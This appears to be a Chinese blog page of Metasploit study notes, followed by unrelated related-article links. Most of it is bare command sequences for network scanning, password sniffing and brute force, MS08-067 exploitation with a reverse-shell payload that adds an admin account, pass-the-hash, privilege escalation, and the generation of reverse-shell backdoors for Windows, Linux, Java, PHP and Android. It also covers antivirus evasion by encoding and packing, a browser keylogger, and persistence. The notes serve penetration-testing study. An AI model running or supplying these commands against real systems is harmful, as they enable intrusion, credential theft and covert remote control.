-----------------第一季--------------------

启动Metasploit:msfconsole

升级和更新:./msfupdate

直接退出:exit 退回上一级:quit

1.端口扫描:

a.调用Nmap扫描

nmap -v -sV ip

b.调用msf模块扫描(1)

 use auxiliary/scanner/portscan/syn

 show options

 set INTERFACE 网卡

 set PORTS 端口

 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)

 set THREADS 100

 run

2.SMB扫描_获取系统信息

 msfconsole

 use auxiliary/scanner/smb/smb_version

 show options

 set RHOST IP

(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)

 set THREADS 10

 run

3.服务识别(ssh)

 msfconsole

 use auxiliary/scanner/ssh/ssh_version

 show options

 set RHOST IP

 run

服务识别(FTP)

 use auxiliary/scanner/ftp/ftp_version

 show options

 set FTPUSER

 set RHOST IP

 run

4.密码嗅探

 msfconsole

 use auxiliary/sniffer/psnuffle

 show options

 run

5.SNMP扫描与枚举

 msfconsole

 search snmp

 use auxiliary/scanner/snmp/snmp_login

 show options

 set RHOST IP

 set THREADS 10

 run

 use auxiliary/scanner/snmp/snmp_enum

 set RHOST IP

 set THREADS 10

 run

6.SMB登陆验证

 msfconsole

 use auxiliary/scanner/smb/smb_login

 show options

 set RHOST IP

 set SMBUser administrator

 set THREADS 100

 run

7.VNC身份验证

 msfconsole

 use auxiliary/scanner/vnc/vnc_none_auth

 show options

 set RHOST IP

 set THREADS 100

 run

8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)

 msfconsole

 load wmap

 wmap_sites

 wmap_sites -a url

 wmap_sites -l

 wmap_targets -h

 wmap_targets -t url

 wmap_targets -l

 wmap_run -h

 wmap_run -t 

---------------第二季--------------
1.远程代码执行

 msfconsole

 search 08-067

 use exploit/windows/smb/ms08_067_netapi

 show options

 set RHOST IP

 show payloads

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST ip

 info(查看影响版本)

 用nmap查看目标服务器版本

 set target 编号

 show options(检查是否已经设置好)

 exploit

 shell

 net user admin admin /add

2.MJDJ文件解析远程代码执行

 msfconsole 

 search12-004

 use exploit/windows/browser/ms12_004_midi

 show options

 set SRVHOST IP

 exploit

 set URIPATH /

 show options

 set LPORT 1244

 show options

 exploit

 sessions

 sessions -i id

 

3.口令安全

 msfconsole

 serach msql_login(ssh_login,ftp_login)

 use auxiliary/scanner/mysql/mysql_login

 set RHOST IP

 set USERNAME root

 set PASS_FILE 字典路径

 set THREAD 50

 set options(check)

 exploit

4.hash值传递渗透

(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)

 msfconsole

 use/windows/smb/psexec

 show options

 set RHOST IP

 set SMMBUSER 帐号

 show options

 exploit

 hashdump(获取hash值)

 exit

 set smbpass hash

 exploit

5.NDP内核提权

前提:必须有一个session

 serarch 14-002

 use  exploit/windows/local/ms_ndproxy

 show options

 set session 1(id)

 show options

 exploit

提权:getsystem

6.多种后门的生成
a.windows后门的生成

 msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe

 search handler

 use exploit/mulit/handler

 show options

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 set LPORT 端口

 点击123.exe

b.linux后门的生成

 msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux

 chmod 777 linux

 ls

 ./linux

c.java后门的生成

 msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar

 

d.php后门的生成

 msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php

上传到目标站-本地监听-目标访问服务器

e.安桌后门的生成

 msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk

 目标运行1.apk

 本地监听

 

7.内网渗透

获得shell扫描c段

 run get_local_subnets 获取网卡

 run autoroute -s ip 扫描c段

劫持域管理

 use incognito

 impersonate_token 域

 shell

-----------------------

 use auxiliary/sniffer/psnuffle

 run

 

8.反反病毒(免杀)

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe

------------------------------------------------------------------------------

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe

-------------------------------------------------------------------------------

msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10

-----------------------------------------------------------------

upx -5 /1231.exe 加壳

 

9.不一样的xss(键盘记录)

 msfconsole

 search keylogger

 use auxiliary/server/capture/http_javascript_keyloger

 show options

 set DEMO true

 set URIPATH /

 set srvport 80

 run

10.维持访问

 msfconsole

 use exploit/multi/handler

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 SET LPORT 1111

 run

 run metsvs -A

-------------------------------------------

 use exploit/multi/handler

 set payload windows/meterpreter/metsvs_bind_tcp

 show options

 set LPORT 31337

 set RHOST IP

 exploit

 keyscan_start(键盘记录)

 keyscan_dump

羽翼metasploit第一,二季学习笔记的更多相关文章

  1. 《Linux内核设计与实现》 第一二章学习笔记

    <Linux内核设计与实现> 第一二章学习笔记 第一章 Linux内核简介 1.1 Unix的历史 Unix的特点 Unix很简洁,所提供的系统调用都有很明确的设计目的. Unix中一切皆 ...

  2. 《java编程思想(第四版)》第一二章学习笔记

    目录 一.Introduction 1.抽象过程 2.面向对象语言(包括Java)的五个基本特性 3.每个对象都提供服务 4.public.private.protected三者的区别 5.Java的 ...

  3. 《Linux内核设计与实现》第一、二章学习笔记

    <Linux内核设计与实现>第一.二章学习笔记 姓名:王玮怡  学号:20135116 第一章 Linux内核简介 一.关于Unix ——一个支持抢占式多任务.多线程.虚拟内存.换页.动态 ...

  4. 毕业设计 之 二 PHP学习笔记(一)

    毕业设计 之 二 PHP学习笔记(一) 作者:20135216 平台:windows10 软件:XAMPP,DreamWeaver 一.环境搭建 1.XAMPP下载安装 XAMPP是PHP.MySQL ...

  5. 学习笔记(三)--->《Java 8编程官方参考教程(第9版).pdf》:第十章到十二章学习笔记

    回到顶部 注:本文声明事项. 本博文整理者:刘军 本博文出自于: <Java8 编程官方参考教程>一书 声明:1:转载请标注出处.本文不得作为商业活动.若有违本之,则本人不负法律责任.违法 ...

  6. VBA二次学习笔记(1)——文件操作

    说明(2018-9-1 11:20:46): 1. 上班三个月了,累的一逼,真的是钱少事多离家远,每天早上六点起,晚上八点回.哎,少壮不努力啊! 2. 三个月没写博客了,上一篇已经是5.29的了,真的 ...

  7. 《Linux命令行与shell脚本编程大全》 第一、二章 学习笔记

    第一章:初识Linux shell Linux内核负责以下4个主要功能: 1.系统内存管理 2.软件程序管理 3.硬件设备管理 4.文件系统管理 1.系统内存管理 内核不仅管理服务器上的可用物理内存, ...

  8. 《Linux内核设计与实现》 第一、二章学习笔记

    第一章 Linux内核简介 一.Unix 1.Unix的特点 简洁 绝大部分东西都被当做文件对待.这种抽象使对数据和对设备的操作都是通过一套相同的系统调用借口来进行的:open(),read(),wr ...

  9. 《Linux内核设计与实现》第一二章读书笔记

    第一章 Linux内核简介 1.Unix简介 (一)概念:支持抢占式多任务.多进程.虚拟内存.换页.动态链接和TCP/IP网络的现代化操作系统. (二)Unix特点(层次化结构): Unix很简洁,仅 ...

随机推荐

  1. Python类中的__init__() 和 self 的解析

    原文地址https://www.cnblogs.com/ant-colonies/p/6718388.html 1.Python中self的含义 self,英文单词意思很明显,表示自己,本身. 此处有 ...

  2. Linux环境变量具体内容介绍

    在Linux中,环境变量是一个很重要的概念.环境变量可以由系统.用户.Shell以及其他程序来设定. 变量就是一个可以被赋值的字符串,赋值范围包括数字.文本.文件名.设备以及其他类型的数据. 下面的例 ...

  3. c# System.Object类和数据的安全转型

    .NET Fraework 最重要的引用类型之一是System命名空间中Object类.所有的类都是System.Object的派生类.System.Object类型的变量System.Object的 ...

  4. java8学习笔记之lambda表达式

    1.lambda表达式特点 lambda表达式可以理解为可传递的匿名函数的一种方式,无名称,但有参数列表和函数体以及返回类型,可能还有一个可抛出异常的列表. 2.lambda表达式基本语法 (para ...

  5. DB2 错误代码

    sqlcode sqlstate 说明 000 00000 SQL语句成功完成 01xxx SQL语句成功完成,但是有警告 +012 01545 未限定的列名被解释为一个有相互关系的引用 +098 0 ...

  6. IP通信基础学习第三周(上)

    TCP的连接情况有:同时打开,同时关闭,拒绝连接,异常终止连接. TCP流量控制的折中方法是滑动窗口协议,且TCP标准强烈不赞成发送窗口沿向后缩回. 在滑动窗口中,当A发送了11个字节的数据时,P3- ...

  7. 根据MAC地址获取网络地址及ZDP_NwkAddrReq函数的用法

    1..对于设备需要获取本设备的网络地址和MAC地址: NLME_GetShortAddr()——返回本设备的16位网络地址 NLME_GetExtAddr()——  返回本设备的64位扩展地址 2.使 ...

  8. nodejs笔记之搭建服务器

    简单服务器搭建: 1.新建一个文件:app.js 2.加入实现服务器代码: const http = require("http"); http.createServer(func ...

  9. iOS项目之苹果审核被拒

    解读: 3.2 其他业务模式问题下方列表并非详尽清单,并且您提交的 App 可能会导致我们的政策有所更改或更新,但这里有一些额外的应做事宜和勿做事宜需要您谨记在心: 可以接受 (i)在您的 App 中 ...

  10. RXD, tree and sequence IN HDU6065

    解这道题绕了好多弯路...先是把"depth of the least common ancestor"这句话忽视掉,以为是最深点与最浅点的深度差:看到某人题解(的开头)之后发现自 ...